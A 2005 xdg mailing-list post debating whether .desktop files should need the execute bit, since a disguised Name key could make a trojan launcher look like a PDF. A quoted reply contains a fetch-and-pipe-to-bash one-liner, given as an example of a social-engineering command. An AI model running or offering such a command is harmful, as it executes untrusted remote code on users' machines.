"Name" key value in desk. entry spec collides with file names, could misguide users?

Jeffrey Vaughan vaughan2 at seas.upenn.edu
Sun Mar 20 21:20:30 EET 2005


Diego Calleja wrote:
> El Sun, 20 Mar 2005 17:04:01 +0000,
> Mike Hearn <mike at navi.cx> escribió:
> 
>>It is not, you just have to check the right boxes in the properties
>>window. Anybody can learn that. I don't agree that this would have any
>>benefit at all, not even psychological - fundamentally writing trojan
>>horses is not difficult and if you can convince somebody to click on an
>>icon you can convince them to copy/paste some meaningless command into
>>the "Run" dialog like:
>>
>>  wget http://foo.org/bar.sh -q -O /dev/stdout | bash -
>>
>>which achieves the same effect.
> 
> 
> Downloading a file is very different from running a command. Many people won't fall so
> easily on  that one (altough some - very few - people fell on the "write format C: trick"). Why,
> I don't really know. It probably has something to do with double clicking being a normal
> and trusted operation (the basis of their interaction with computers) and pasting
> weird commands being something unusual and obscure.
> 

I often use the following work pattern:
1) Download 15ish academic papers with file names like: popl2003acm.pdf 
or df3324r.pdf.
2) For each file in my firefox download directory that looks like a pdf 
in the gui, double click on the paper.
3) Rename or delete the paper as appropriate.

Is there anyway to do this safely without either 1) requiring +x set on 
.desktop files, 2) using the command line (real pita to switch between 
the mouse for scrolling/zooming & the keyboard for opening pdfs) 3) 
waiting n years for for selinux other other not-ready-yet technology?

If these are the only option I think we can dismiss 2 & 3.  Let's set 
that execute bit.

--Jeff



More information about the xdg mailing list